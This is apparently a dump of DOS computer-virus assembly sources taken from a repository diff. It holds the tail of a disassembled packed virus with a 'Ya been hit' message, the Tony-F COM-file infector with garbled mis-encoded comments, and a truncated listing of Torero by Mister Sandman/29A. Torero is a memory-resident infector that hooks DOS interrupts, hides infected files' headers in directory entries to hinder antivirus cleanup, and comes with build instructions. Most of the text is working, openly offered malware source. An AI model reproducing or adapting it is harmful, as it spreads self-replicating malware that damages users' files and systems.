|
||||
db 65h, 63h, 6Fh, 64h, 69h, 6Eh
|
||||
db 0FFh, 7Fh
|
||||
db 'g system files $'
|
||||
db 0F8h, 7Fh,0E7h
|
||||
db 'Ya', 27h, ' been hit'
|
||||
db 0F8h,0FFh,0F7h
|
||||
db 'y The Immigr'
|
||||
db 0E1h, 21h, 61h, 6Eh,0EFh, 54h
|
||||
db 72h, 6Fh, 6Ah,0F8h, 20h,0CEh
|
||||
db 0C3h,0C4h, 65h, 64h,0E2h, 6Fh
|
||||
db 78h,0C3h
|
||||
db 69h
|
||||
|
||||
locloop_3:
|
||||
jmp bx ;*Register jump
|
||||
db 'a. [C.S.A.]'
|
||||
db 0BEh, 2Eh, 02h, 00h, 24h, 00h
|
||||
db 0F0h
|
||||
db 13 dup (0)
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
;-------------------------------------------------------------- seg_b ----
|
||||
|
||||
seg_b segment byte public
|
||||
assume cs:seg_b , ds:seg_b , ss:stack_seg_c
|
||||
|
||||
db 10h, 00h
|
||||
data_13 dw 0
|
||||
data_14 dw 100h
|
||||
data_15 dw 0Ch
|
||||
data_16 dw 0Ch
|
||||
data_17 dw 12h
|
||||
data_18 dw 15Ch
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;
|
||||
; Program Entry Point
|
||||
;
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
tit proc far
|
||||
|
||||
start:
|
||||
push es
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,data_18 ; (80B2:000C=15Ch)
|
||||
mov si,cx
|
||||
dec si
|
||||
mov di,si
|
||||
mov bx,ds
|
||||
add bx,data_17 ; (80B2:000A=12h)
|
||||
mov es,bx
|
||||
std ; Set direction flag
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
push bx
|
||||
mov ax,2Bh
|
||||
push ax
|
||||
retf
|
||||
mov bp,cs:data_16 ; (80B2:0008=0Ch)
|
||||
mov dx,ds
|
||||
loc_6:
|
||||
mov ax,bp
|
||||
cmp ax,1000h
|
||||
jbe loc_7 ; Jump if below or =
|
||||
mov ax,1000h
|
||||
loc_7:
|
||||
sub bp,ax
|
||||
sub dx,ax
|
||||
sub bx,ax
|
||||
mov ds,dx
|
||||
mov es,bx
|
||||
mov cl,3
|
||||
shl ax,cl ; Shift w/zeros fill
|
||||
mov cx,ax
|
||||
shl ax,1 ; Shift w/zeros fill
|
||||
dec ax
|
||||
dec ax
|
||||
mov si,ax
|
||||
mov di,ax
|
||||
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
|
||||
or bp,bp ; Zero ?
|
||||
jnz loc_6 ; Jump if not zero
|
||||
cld ; Clear direction
|
||||
mov es,dx
|
||||
mov ds,bx
|
||||
xor si,si ; Zero register
|
||||
xor di,di ; Zero register
|
||||
mov dx,10h
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
loc_8:
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_9 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_9:
|
||||
jnc loc_10 ; Jump if carry=0
|
||||
movsb ; Mov [si] to es:[di]
|
||||
jmp short loc_8 ; (0069)
|
||||
loc_10:
|
||||
xor cx,cx ; Zero register
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_11 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_11:
|
||||
jc loc_14 ; Jump if carry Set
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_12 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_12:
|
||||
rcl cx,1 ; Rotate thru carry
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_13 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_13:
|
||||
rcl cx,1 ; Rotate thru carry
|
||||
inc cx
|
||||
inc cx
|
||||
lodsb ; String [si] to al
|
||||
mov bh,0FFh
|
||||
mov bl,al
|
||||
jmp locloop_15 ; (00BB)
|
||||
loc_14:
|
||||
lodsw ; String [si] to ax
|
||||
mov bx,ax
|
||||
mov cl,3
|
||||
shr bh,cl ; Shift w/zeros fill
|
||||
or bh,0E0h
|
||||
and ah,7
|
||||
jz loc_16 ; Jump if zero
|
||||
mov cl,ah
|
||||
inc cx
|
||||
inc cx
|
||||
|
||||
locloop_15:
|
||||
mov al,es:[bx+di]
|
||||
stosb ; Store al to es:[di]
|
||||
loop locloop_15 ; Loop if cx > 0
|
||||
|
||||
jmp short loc_8 ; (0069)
|
||||
loc_16:
|
||||
lodsb ; String [si] to al
|
||||
or al,al ; Zero ?
|
||||
jz loc_18 ; Jump if zero
|
||||
cmp al,1
|
||||
je loc_17 ; Jump if equal
|
||||
mov cl,al
|
||||
inc cx
|
||||
jmp short locloop_15 ; (00BB)
|
||||
loc_17:
|
||||
mov bx,di
|
||||
and di,0Fh
|
||||
add di,data_6e ; (0010:2000=89h)
|
||||
mov cl,4
|
||||
shr bx,cl ; Shift w/zeros fill
|
||||
mov ax,es
|
||||
add ax,bx
|
||||
sub ax,200h
|
||||
mov es,ax
|
||||
mov bx,si
|
||||
and si,0Fh
|
||||
shr bx,cl ; Shift w/zeros fill
|
||||
mov ax,ds
|
||||
add ax,bx
|
||||
mov ds,ax
|
||||
jmp loc_8 ; (0069)
|
||||
db 41h, 43h, 2Dh, 44h, 43h
|
||||
loc_18:
|
||||
push cs
|
||||
pop ds
|
||||
mov si,offset data_19 ; (80B2:0158=11h)
|
||||
pop bx
|
||||
add bx,10h
|
||||
mov dx,bx
|
||||
xor di,di ; Zero register
|
||||
loc_19:
|
||||
lodsb ; String [si] to al
|
||||
or al,al ; Zero ?
|
||||
jz loc_21 ; Jump if zero
|
||||
mov ah,0
|
||||
loc_20:
|
||||
add di,ax
|
||||
mov ax,di
|
||||
and di,0Fh
|
||||
mov cl,4
|
||||
shr ax,cl ; Shift w/zeros fill
|
||||
add dx,ax
|
||||
mov es,dx
|
||||
add es:[di],bx
|
||||
jmp short loc_19 ; (0109)
|
||||
loc_21:
|
||||
lodsw ; String [si] to ax
|
||||
or ax,ax ; Zero ?
|
||||
jnz loc_22 ; Jump if not zero
|
||||
add dx,0FFFh
|
||||
mov es,dx
|
||||
jmp short loc_19 ; (0109)
|
||||
loc_22:
|
||||
cmp ax,1
|
||||
jne loc_20 ; Jump if not equal
|
||||
mov ax,bx
|
||||
mov di,data_14 ; (80B2:0004=100h)
|
||||
mov si,data_15 ; (80B2:0006=0Ch)
|
||||
add si,ax
|
||||
add data_13,ax ; (80B2:0002=0)
|
||||
sub ax,10h
|
||||
mov ds,ax
|
||||
mov es,ax
|
||||
xor bx,bx ; Zero register
|
||||
cli ; Disable interrupts
|
||||
mov ss,si
|
||||
mov sp,di
|
||||
sti ; Enable interrupts
|
||||
jmp dword ptr cs:[bx] ;*
|
||||
data_19 db 11h
|
||||
db 0, 1, 0
|
||||
db 292 dup (0)
|
||||
|
||||
tit endp
|
||||
|
||||
seg_b ends
|
||||
|
||||
|
||||
|
||||
;--------------------------------------------------------- stack_seg_c ---
|
||||
|
||||
stack_seg_c segment word stack 'STACK'
|
||||
|
||||
db 128 dup (0)
|
||||
|
||||
stack_seg_c ends
|
||||
|
||||
end start
|
||||
|
||||
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,201 @@
|
|||
;------------------------------------------------------------------------------;
|
||||
; ;
|
||||
; ‚¨°³± Tony-F ;
|
||||
; ;
|
||||
; Tony_F ¥ ¯ ° §¨²¥ ¢¨°³±,¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤®²® - ¯°¨ ±² °²¨° ¥;
|
||||
; § ° §¥ ´ ©« ¢¨°³±º² ¯°¥²º°±¢ ¶¿« ² ²¥ª³¹ ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢ ¢±¨·ª¨ ;
|
||||
; ´ ©«®¢¥ ®²£®¢ °¿¹¨ ?*.COM, ª ²® ? § ¢¨±¨ ®² ¤ ² ² . ;
|
||||
; Tony-F ±¥ ±² ¿¢ ¯°¥¤¨ ª®¤ § ° §¥¨¿ ´ ©«, ¢¨°³±º² ®°£ ¨§¨° ;
|
||||
; ±®¡±²¢¥ ¯°®¶¥¤³° § ®¡° ¡®²ª ª°¨²¨·¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ¥ ¯°®¬¥¿;
|
||||
; ¤ ² ² ¨ · ± § °¿§ ¨²¥ ´ ©«®¢¥. ;
|
||||
; Tony-F ¬¨° ®°¨£¨ «¨¿ ¤°¥± ¢¥ª²®° 21h ¨ £® ¯®±² ¢¿ ¢ ² ¡«¨¶ ² ;
|
||||
; ¯°¥ªº±¢ ¨¿² ª ²® ¢¥ª²®° 3, ² §¨ ®¯¥° ¶¨¿ ¯°¥·¨ ¥¢¥²³ «® ²° ±¨° ¥ ;
|
||||
; ¢¨°³± ± ¤¥¡³£¥°. ;
|
||||
;------------------------------------------------------------------------------;
|
||||
|
||||
; ±¥¬¡«¨° ©²¥ ± Turbo Assembler 2.0+
|
||||
|
||||
.model Tiny
|
||||
.code
|
||||
|
||||
|
||||
VirLen = offset EndCode - offset Start ; „º«¦¨ ¢¨°³± .
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
Org 07Fh
|
||||
|
||||
INT24 db ? ; ’³ª ¹¥ ¡º¤¥ ±®·¥ ¢¥ª²®° 24h.
|
||||
|
||||
|
||||
Org 0100h
|
||||
|
||||
NewDTA db 15h dup (?) ; ‘²°³ª²³° DTA.
|
||||
FAttr db ?
|
||||
FTime dw ?
|
||||
FDate dw ?
|
||||
FLen dw ?, ?
|
||||
FName db 0Dh dup (?)
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
Org 100h
|
||||
|
||||
Start:
|
||||
push ax ; ‡ ¯ §¢ ±º¤º°¦ ¨¥²® AX.
|
||||
|
||||
;...... ’³ª § ¯®·¢ ²º°±¥¥²® ®°¨£¨ «¨¿ ¢¥ª²®° 21h ¢ ±¥£¬¥² „Ž‘
|
||||
|
||||
mov ax,1203h
|
||||
int 2Fh ; <20>°®·¨² ±¥ ±¥£¬¥² „Ž‘.
|
||||
|
||||
xor si,si ; Ž°¨£¨ «¨¿ ¢¥ª²®° ±¥ ²º°±¨ ¯® ¯º°¢¨²¥
|
||||
Again: ; ²°¨ ¡ ©² - 2…h,3€h ¨ 26h.
|
||||
lodsw
|
||||
cmp ax,3A2Eh
|
||||
je NextByte
|
||||
dec si
|
||||
jnz Again
|
||||
jmp Done
|
||||
NextByte:
|
||||
lodsb
|
||||
cmp al,26h
|
||||
jne Again
|
||||
Found:
|
||||
sub si,03
|
||||
|
||||
mov dx,si
|
||||
mov ax,2503H ; ¢¥ª²®° 21h ±¥ ¯®±² ¢¿ ¬¿±²®²®
|
||||
Int 21h ; ¢¥ª²®° 3.
|
||||
|
||||
push cs ; ¢º§±² ®¢¿¢ ±¥ ±²®©®±²² DS.
|
||||
pop ds
|
||||
|
||||
;...... <20>°¥ ±®·¢ ¥ ¢¥ª²®° § ª°¨²¨·¨ £°¥¸ª¨
|
||||
|
||||
mov INT24,0CFh ; ‘º§¤ ¢ ®¢ ¢¥ª²®° 24h - Iret
|
||||
mov ax,2524h
|
||||
mov dx,offset INT24
|
||||
Int 3 ; <20>°¥ ±®·¢ ¢¥ª²®° 24h.
|
||||
|
||||
|
||||
mov ax,cs
|
||||
add ah,10h
|
||||
mov es,ax ; ES = CS + 64 KBytes
|
||||
mov si,offset Start
|
||||
xor di,di
|
||||
mov cx,si ; <20>°¥µ¢º°«¿ ª®¤ ¢¨°³± 64KBytes
|
||||
rep movsb ; ¯®- £®°¥ ¢ ¯ ¬¥²² .
|
||||
|
||||
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ®¢ ¤°¥±.
|
||||
mov ah,1Ah
|
||||
Int 3
|
||||
|
||||
mov ah,2Ah
|
||||
Int 3 ; ˆ±ª ®² „Ž‘ ¤ ² ² ,
|
||||
add dl,'A' ; ¨ ®² ¥¿ ±¥ ¯®«³· ¢ ¯º°¢ ² ¡³ª¢
|
||||
mov AllCom ,dl ; ´ ©«®¢¥²¥ § § ° §¿¢ ¥.
|
||||
|
||||
;...... ‡ ¯®·¢ ²º°±¥¥ ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||||
|
||||
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '?*.COM' ´ ©«®¢¥.
|
||||
mov cl,110B
|
||||
mov ah,4Eh ; ˆ§¢¨ª¢ Find First.
|
||||
Int 3
|
||||
jc Done ; <20>°®¤º«¦ ¢ ² ²ºª ¯°¨ «¨¯±
|
||||
; ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||||
FindNext:
|
||||
mov dx,offset Fname ; ‚ dx ¤°¥± ¨¬¥²® ´ ©« ®² DTA.
|
||||
mov ax,3D02h ; Ž²¢ °¿ ´ ©« § § ¯¨±/·¥²¥¥.
|
||||
Int 3
|
||||
|
||||
mov bx,ax ; ‡ ¯ §¢ ®¬¥° ®²¢®°¥¨¿ ´ ©«.
|
||||
push ds ; ‡ ¯ §¢ DS.
|
||||
push es
|
||||
pop ds ; DS = CS + 64 KBytes.
|
||||
|
||||
mov dx,VirLen ; DX = ¤º«¦¨ ² ¢¨°³± .
|
||||
mov cx,-1 ; <20>°®·¨² ±¥ ¶¥«¨¿ ´ ©« ¤°¥± - DS:DX .
|
||||
mov ah,3Fh ; ’ ¬ ±¥ ¬¨° ¢¨°³± , ±¥£ ±«¥¤ ¥£®
|
||||
Int 3 ; ¨ ´ ©«º².
|
||||
|
||||
; “¢¥«¨· ¢ ¤º«¦¨ ² ´ ©« (AX) ±
|
||||
add ax,Virlen ; ¤º«¦¨ ² ¢¨°³± .
|
||||
jc Close ; <20>°¨ ¯°¥¯º«¢ ¥ ´ ©«º² ¥ ±¥ § ° §¿¢ .
|
||||
|
||||
cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; „ «¨ ´ ©«º² ¥ § ° §¥ ¢¥·¥ ?
|
||||
je Close
|
||||
|
||||
push ax ; ‡ ¯ §¢ ¤º«¦¨ ² ´ ©« ¢ ±²¥ª .
|
||||
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h ; <20>°¥¬¥±²¢ ±¥ ³ª § ²¥«¿ ´ ©« (CX:DX)
|
||||
Int 3 ; ¢ · «®²® ¬³.
|
||||
|
||||
pop cx ; <20>°®·¨² ¤º«¦¨ ² ´ ©« ®² ±²¥ª .
|
||||
; DX ¥ ° ¢® 0 ®² Fn 42.
|
||||
mov ah,40h ; Ž² ¤°¥± DS:DX ±¥ § ¯¨±¢ ¤¨±ª
|
||||
Int 3 ; ¢¨°³± + ´ ©«.
|
||||
|
||||
mov cx,cs:FTime
|
||||
mov dx,cs:FDate ; ‚º§±² ®¢¿¢ ² ±¥ ¤ ² ² ¨ ¢°¥¬¥²®
|
||||
mov ax,5701h ; § ° §¿¢ ¨¿ ´ ©« ®² DTA.
|
||||
Int 3
|
||||
|
||||
Close:
|
||||
pop ds ; ‚º§±² ®¢¿¢ DS.
|
||||
|
||||
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
|
||||
Int 3
|
||||
|
||||
mov ah,4Fh
|
||||
Int 3 ; ˆ§¢¨ª¢ Find Next,
|
||||
jnc FindNext ; ª® ¨¬ ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
|
||||
; ¨ § ²¿µ.
|
||||
|
||||
|
||||
;....... <20> · «® ±² °²¨° ¥ ¯°®£° ¬ ² ªº¬ ª®¿²® ¥ § ª ·¥ ¢¨°³± .
|
||||
|
||||
Done:
|
||||
mov dx,80h
|
||||
mov ah,1Ah
|
||||
Int 3 ; ‚º§±² ®¢¿¢ ±¥ ±² °¨¿ ¤°¥± DTA.
|
||||
|
||||
|
||||
push es
|
||||
mov ax,offset TransF -100h ; <20>°¥¤ ¢ ³¯° ¢«¥¨¥²® ¢¨°³±
|
||||
push ax ; ª®©²® ¥ 64 KBytes ¯®- £®°¥
|
||||
RETF ; ®² ¥²¨ª¥² TransF.
|
||||
|
||||
;........................................
|
||||
; Œ °ª¨°®¢ª § ° §¯®§ ¢ ¥ § ° §¥¨
|
||||
Mark db 'Tony' ; ´ ©«®¢¥.
|
||||
AllCom db '+' ;
|
||||
db '*.COM',0 ; Œ ±ª § ²º°±¥¥ ¢±¨·ª¨ ´ ©«®¢¥
|
||||
;.......................................; § § ° §¿¢ ¥.
|
||||
|
||||
TRansF:
|
||||
push ds
|
||||
pop es
|
||||
|
||||
pop ax ; ‚º§±² ®¢¿¢ ±º¤º°¦ ¨¥²® AX.
|
||||
|
||||
mov si,offset EndCode ; ‘¬ºª¢ ª®¤ ¯°®£° ¬ ² § ¯®·¢ ¹
|
||||
mov di,offset Start ; ¥¯®±°¥¤±²¢¥® ±«¥¤ ¢¨°³± ± 100h ¡ ©² ¤®«³.
|
||||
push ds ; <20>®¤£®²¢¿ ¤°¥± ¢ ±²¥ª § ¯°¥µ®¤
|
||||
push di ; ªº¬ · «®²® ®°¨£¨ « ² ¯°®£° ¬ .
|
||||
mov cx,0FFF0h -102h -Virlen
|
||||
rep movsb
|
||||
|
||||
RETF
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
EndCode:
|
||||
Ret ; Ž² ²³ª § ¯®·¢ § ° §¥ ² ¯°®£° ¬
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
End Start
|
||||
|
|
@ -0,0 +1,570 @@
|
|||
;
|
||||
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
|
||||
; Torero ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
|
||||
; by Mister Sandman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
|
||||
; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
|
||||
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
|
||||
;
|
||||
; Hoho... here you have a new coolio viral technique, especially dedicated
|
||||
; to those who think that everything on viruses was invented yet :) This
|
||||
; virus ain't a 'powerful' one; in fact, and as i decided to do in this
|
||||
; first issue as i hadn't many time, it's a simple infector just written
|
||||
; to show this new viral capability, never used before as far as i know.
|
||||
;
|
||||
; And what is this technique about?, you might ask. Ok... apart from DirII
|
||||
; and all its family, we don't know many viruses that store the original
|
||||
; header of infected files in other place than the viral code, right?
|
||||
;
|
||||
; AVV and i were making some researches and suddenly found ten free unused
|
||||
; bytes on the directory entry of each file... and this the place where my
|
||||
; virus stores the header of every file it infects :) In this way, the AV
|
||||
; companies must write some specific routines for disinfecting Torero...
|
||||
; this means that the cleaning of our virus is more difficult, which is
|
||||
; what we're looking for :)
|
||||
;
|
||||
; Anyway, as every viral technique, it has some pros and some cons... and
|
||||
; the cons consist on the next simple thingy: if someone copies, compress-
|
||||
; es, or manipulates an infected file, it will have a different directory
|
||||
; entry, and then it will be imposible to restore its original header.
|
||||
;
|
||||
; However, and as this is just a sample virus, i didn't pay much attention
|
||||
; to this kinda probabilities, and i just used an idea Wintermute gave me:
|
||||
; if the host doesn't find its original header, it will display a message
|
||||
; i'm sure you all know: 'This program requires Microsoft Windows.' :)
|
||||
;
|
||||
; As a last (but not least) feature in this virus, don't forget to have a
|
||||
; look at the infection mark, based on using the eigth attribute bit, al-
|
||||
; ways empty and unused until now. This is a specially good infection mark
|
||||
; for a virus, as it's very simple and doesn't get flagged because of in-
|
||||
; correct time stamp and all that shit. Besides, it makes things easier
|
||||
; for us when implementing stealth techniques, etc.
|
||||
;
|
||||
; About the name, i decided to call it 'Torero' because it's a spanish
|
||||
; word which means 'bullfighter', often used for telling someone that he
|
||||
; or what he did is cool, because toreros are supposed to have the biggest
|
||||
; nuts around :)
|
||||
;
|
||||
; Compiling instructions
|
||||
;
|
||||
; tasm /m torero.asm
|
||||
; tlink torero.obj
|
||||
; exe2bin torero.exe torero.com
|
||||
|
||||
|
||||
.286
|
||||
torero segment byte public
|
||||
assume cs:torero,ds:torero
|
||||
org 0
|
||||
|
||||
torero_start label byte
|
||||
torero_size equ torero_end-torero_start
|
||||
|
||||
torero_entry: call delta_offset ; Get ë-offset in BP
|
||||
delta_offset: pop bp ; for l8r use
|
||||
sub bp,offset delta_offset
|
||||
|
||||
mov ah,30h ; Get DOS version
|
||||
int 21h
|
||||
|
||||
cmp bx,';)' ; Are we already
|
||||
jne set_int_21h ; memory resident?
|
||||
|
||||
push cs ; Save CS for the host
|
||||
mov bx,ds ; Don't lose DS
|
||||
xor ax,ax ; Jump to the memory
|
||||
mov ds,ax ; copy and restore
|
||||
push word ptr ds:[21h*4+2] ; the host header
|
||||
push offset check_host
|
||||
mov ds,bx
|
||||
retf
|
||||
|
||||
set_int_21h: mov ax,es
|
||||
dec ax
|
||||
mov ds,ax ; Program's MCB segment
|
||||
xor di,di
|
||||
|
||||
cmp byte ptr ds:[di],'Y' ; Is it a Z block?
|
||||
jna set_int_21h
|
||||
|
||||
sub word ptr ds:[di+3],((torero_size/10h)+2)
|
||||
sub word ptr ds:[di+12h],((torero_size/10h)+2)
|
||||
add ax,word ptr ds:[di+3]
|
||||
inc ax
|
||||
|
||||
mov ds,ax
|
||||
mov byte ptr ds:[di],'Z' ; Mark block as Z
|
||||
mov word ptr ds:[di+1],8 ; System memory
|
||||
mov word ptr ds:[di+3],((torero_size/10h)+1)
|
||||
mov word ptr ds:[di+8],4f44h ; Mark block as owned
|
||||
mov word ptr ds:[di+0ah],0053h ; by DOS (444f53h,0)
|
||||
inc ax
|
||||
|
||||
cld
|
||||
push cs
|
||||
pop ds
|
||||
mov es,ax
|
||||
mov cx,torero_size ; Copy virus to memory
|
||||
mov si,bp
|
||||
rep movsb
|
||||
|
||||
push es
|
||||
push offset copy_vector ; Jump to the virus
|
||||
retf ; copy in memory
|
||||
|
||||
copy_vector: push ds
|
||||
mov ds,cx
|
||||
mov es,ax ; Save int 21h's
|
||||
mov si,21h*4 ; original vector
|
||||
lea di,old_int_21h
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr [si-4],offset new_int_21h
|
||||
mov word ptr [si-2],ax ; Set ours
|
||||
|
||||
mov si,13h*4 ; Save int 13h's
|
||||
lea di,old_int_13h ; original vector
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr [si-4],offset new_int_13h
|
||||
mov word ptr [si-2],ax ; Set ours
|
||||
|
||||
mov ds,ax
|
||||
check_host: call open_host ; Open the host
|
||||
call get_sft ; Get its SFT for our
|
||||
call check_mark ; infection mark
|
||||
jb messed_up ; File is messed up :-(
|
||||
|
||||
call read_entry ; Read the entry
|
||||
call point_entry ; Point to the header
|
||||
cmp word ptr ds:[si],0 ; Is it empty?
|
||||
jne restore_header
|
||||
|
||||
cmp word ptr ds:[si+2],0 ; Empty too? huh :-(
|
||||
je messed_up ; File is messed up
|
||||
|
||||
restore_header: pop es ; ES=host segment
|
||||
push es ; Store it in the stack
|
||||
mov di,100h ; file header from the
|
||||
push di ; Store the IP
|
||||
movsw ; DS:SI points to the
|
||||
movsb ; original header, in
|
||||
; the directory entry
|
||||
push es
|
||||
pop ds ; DS=ES
|
||||
retf ; Jump to the host
|
||||
|
||||
messed_up: mov ah,3eh ; File is messed up...
|
||||
int 21h ; close it and show
|
||||
call emergency ; the Windows message :)
|
||||
|
||||
; ÄÄ´ Torero's int 13h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_int_13h: cmp ah,3
|
||||
je sector_write ; Sector write?
|
||||
|
||||
db 0eah ; Jump back to the
|
||||
old_int_13h dw ?,? ; original int 13h
|
||||
|
||||
sector_write: push ax bx cx
|
||||
pushf
|
||||
|
||||
xor ah,ah ; Calculate how many
|
||||
mov cl,4 ; files we must test
|
||||
shl ax,cl ; by multiplying the
|
||||
mov cx,ax ; sector number with
|
||||
or cx,cx ; 10h (entries)
|
||||
je bucle_end
|
||||
|
||||
int_13h_bucle: cmp byte ptr es:[bx+9],'O' ; -O-?
|
||||
jne more_files
|
||||
|
||||
mov al,byte ptr es:[bx+9]
|
||||
sub al,2
|
||||
cmp al,byte ptr es:[bx+0ah] ; -OM?
|
||||
jne more_files
|
||||
cmp al,'M' ; Then it's a COM
|
||||
je subtract
|
||||
|
||||
more_files: add bx,20h ; Look for more files
|
||||
loop int_13h_bucle ; Look'n'loop :)
|
||||
|
||||
bucle_end: popf
|
||||
pop cx bx ax ; End of the bucle
|
||||
; Call the original
|
||||
call int_13h ; int 13h and jump
|
||||
xor_and_jump: xor ax,ax ; to the original int
|
||||
|
||||
return_to_int: push bp ax
|
||||
pushf
|
||||
|
||||
pop ax ; Return to the
|
||||
mov bp,sp ; original int 13h
|
||||
mov word ptr ss:[bp+8],ax
|
||||
|
||||
pop ax bp
|
||||
retf 2
|
||||
|
||||
subtract: cmp byte ptr es:[bx],0e5h ; A deleted file...
|
||||
je more_files ; bah, skip it
|
||||
|
||||
cmp byte ptr es:[bx+0bh],80h ; Infected?
|
||||
jb more_files
|
||||
|
||||
cmp word ptr es:[bx+0ch],0 ; Is the header field
|
||||
jne more_files ; empty?
|
||||
|
||||
cmp word ptr es:[bx+0eh],0
|
||||
jne more_files
|
||||
|
||||
mov ax,word ptr cs:[header_store] ; Ok, let's copy
|
||||
mov word ptr es:[bx+0ch],ax ; the original file
|
||||
; header to the
|
||||
mov ax,word ptr cs:[header_store+2] ; directory entry
|
||||
mov word ptr es:[bx+0eh],ax
|
||||
jmp more_files
|
||||
|
||||
; ÄÄ´ Torero's signature ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
signature db 0dh,0ah,'[Torero €:-) by Mister Sandman/29A]',0dh,0ah
|
||||
|
||||
; ÄÄ´ Torero's int 21h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_int_21h: cli
|
||||
cmp ah,6ch ; This code is stolen
|
||||
ja real_checks ; from the original
|
||||
; DOS kernel handler,
|
||||
cmp ah,33h ; so they won't catch
|
||||
jb real_checks ; us if they don't go
|
||||
jz fake_stuff ; further thru the
|
||||
; rest of the code of
|
||||
cmp ah,64h ; the handler... thanx
|
||||
ja fake_stuff ; to Qark for this
|
||||
jz real_checks ; cool idea :)
|
||||
|
||||
cmp ah,51h
|
||||
jz real_checks
|
||||
|
||||
cmp ah,62h
|
||||
jz fake_stuff
|
||||
|
||||
cmp ah,50h
|
||||
jz real_checks
|
||||
|
||||
fake_stuff: push ax bx cx ; Shit, shit, shit,
|
||||
nop ; shit... skip it
|
||||
pop cx bx ax
|
||||
|
||||
real_checks: cmp ah,30h
|
||||
jne opening ; (get DOS version)?
|
||||
|
||||
mov bx,';)' ; Return the smiley :)
|
||||
iret
|
||||
|
||||
opening: cmp ah,3dh ; File opening?
|
||||
je file_open
|
||||
|
||||
cmp ax,4301h ; Attribute change?
|
||||
je new_attribute
|
||||
|
||||
cmp ax,6c00h ; Extended open?
|
||||
je file_open
|
||||
|
||||
jmp_int_21h db 0eah ; Jump to the original
|
||||
old_int_21h dw ?,? ; int 21h address
|
||||
|
||||
; ÄÄ´ File open ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
file_open: call infect_file ; Infection routine
|
||||
jmp dword ptr cs:[old_int_21h] ; Jump back to int 21h
|
||||
|
||||
; ÄÄ´ New attribute ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_attribute: mov ah,30h ; Change 43h for 30h
|
||||
iret ; so it will do nothing
|
||||
|
||||
; ÄÄ´ Infection routine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
infect_file: pushf
|
||||
